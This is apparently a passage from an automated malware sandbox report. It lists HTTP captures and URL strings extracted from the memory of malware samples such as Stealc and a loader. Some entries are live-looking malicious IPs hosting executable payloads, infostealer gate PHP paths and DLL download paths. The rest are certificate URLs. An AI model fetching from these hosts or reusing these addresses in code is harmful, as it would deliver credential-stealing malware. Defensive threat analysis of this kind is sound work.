65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 26 Aug 2024 21:30:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 26 Aug 2024 21:30:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 26 Aug 2024 21:30:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Source: stealc_default2.exe, 0000001F.00000002.2155271434.000000000041D000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: Http://185.215.113.17/2fb6c2cc8dce150a.phption:
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://154.216.18.223/setup2.exe
Source: axplong.exe, 00000011.00000002.2518786518.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php192001
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php7
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpC
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpKw
Source: axplong.exe, 00000011.00000002.2518786518.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpU
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpk
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedEcy
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedLc
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedhcd
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnu
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpsck
Source: axplong.exe, 00000011.00000002.2518786518.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/BitcoinCore.exe
Source: axplong.exe, 00000011.00000002.2518786518.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/BitcoinCore.exe2
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/BitcoinCore.exe;
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/BitcoinCore.exe?
Source: axplong.exe, 00000011.00000002.2518786518.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/GOLD.exe
Source: axplong.exe, 00000011.00000002.2518786518.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/GOLD.exe?
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/Set-up.exe=
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/Set-up.exea
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/XClient_protected.exe
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/crypteda.exe
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/runtime.exe
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/runtime.exeN
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/stealc_default2.exe
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/whiteheroin.exe
Source: stealc_default2.exe, 0000001F.00000002.2155271434.00000000002AC000.00000004.00000001.01000000.00000014.sdmp, stealc_default2.exe, 0000001F.00000002.2155271434.000000000041D000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: http://185.215.113.17
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 0000001F.00000002.2156458487.00000000010CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/
Source: stealc_default2.exe, 0000001F.00000002.2155271434.00000000002DA000.00000004.00000001.01000000.00000014.sdmp, stealc_default2.exe, 0000001F.00000002.2155271434.000000000041D000.00000004.00000001.01000000.00000014.sdmp, stealc_default2.exe, 0000001F.00000002.2156458487.000000000112E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000112E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php&
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000112E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php.dll
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php6
Source: stealc_default2.exe, 0000001F.00000002.2156458487.00000000010CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpData
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000112E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpS
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpV
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpZ
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000112E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpdll
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpf
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpic_qt
Source: stealc_default2.exe, 0000001F.00000002.2155271434.000000000041D000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phption:
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/Q
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/freebl3.dll
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dll
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dll$
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dllh
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dllt
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll6
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll~
Source: stealc_default2.exe, 0000001F.00000002.2156458487.00000000010CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.dll
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dll
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dllF
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dllH
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dllZ
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dllz
Source: stealc_default2.exe, 0000001F.00000002.2155271434.00000000002DA000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll2
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll
Source: stealc_default2.exe, 0000001F.00000002.2156458487.0000000001112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll9
Source: stealc_default2.exe, 0000001F.00000002.2155271434.000000000041D000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: http://185.215.113.172fb6c2cc8dce150a.phption:
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, crypteda.exe.17.dr, GOLD[1].exe.17.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: nss3[1].dll.31.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3[1].dll.31.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 00000020.00000000.2007562137.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2539794352.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.1998005775.0000000007306000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: nss3[1].dll.31.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, crypteda.exe.17.dr, GOLD[1].exe.17.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: nss3[1].dll.31.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.31.dr, crypteda.exe.17.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, GOLD[1].exe.17.dr, mozglue.dll.31.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, crypteda.exe.17.dr, GOLD[1].exe.17.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, crypteda.exe.17.dr, GOLD[1].exe.17.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, runtime.exe.17.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, runtime.exe.17.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: runtime.exe, 00000023.00000002.2070175435.0000000000434000.00000004.00000001.01000000.00000018.sdmp, runtime.exe, 00000023.00000002.2070175435.0000000000420000.00000004.00000001.01000000.00000018.sdmp	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: runtime.exe, 00000023.00000002.2070175435.0000000000434000.00000004.00000001.01000000.00000018.sdmp, runtime.exe, 00000023.00000002.2070175435.0000000000420000.00000004.00000001.01000000.00000018.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, runtime.exe.17.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, runtime.exe.17.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: runtime.exe, 00000023.00000002.2070175435.0000000000434000.00000004.00000001.01000000.00000018.sdmp, runtime.exe, 00000023.00000002.2070175435.0000000000420000.00000004.00000001.01000000.00000018.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, runtime.exe.17.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: runtime.exe, 00000023.00000002.2070175435.0000000000434000.00000004.00000001.01000000.00000018.sdmp, runtime.exe, 00000023.00000002.2070175435.0000000000420000.00000004.00000001.01000000.00000018.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: nss3[1].dll.31.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3[1].dll.31.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: nss3[1].dll.31.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000020.00000000.2007562137.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2539794352.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.1998005775.0000000007306000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, crypteda.exe.17.dr, GOLD[1].exe.17.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: nss3[1].dll.31.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.31.dr, crypteda.exe.17.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, GOLD[1].exe.17.dr, mozglue.dll.31.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: nss3[1].dll.31.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3[1].dll.31.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3[1].dll.31.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: explorer.exe, 00000020.00000000.2007562137.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2539794352.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.1998005775.0000000007306000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, crypteda.exe.17.dr, GOLD[1].exe.17.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: nss3[1].dll.31.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: explorer.exe, 00000020.00000002.2549047522.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2549047522.000000000BFD0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://denfiusyvarbl.net/
Source: explorer.exe, 00000020.00000002.2549047522.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://denfiusyvarbl.net/application/x-www-form-urlencodedMozilla/5.0
Source: BitcoinCore[1].exe.17.dr	String found in binary or memory: http://digitalbush.com/projects/masked-input-plugin/#license)
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
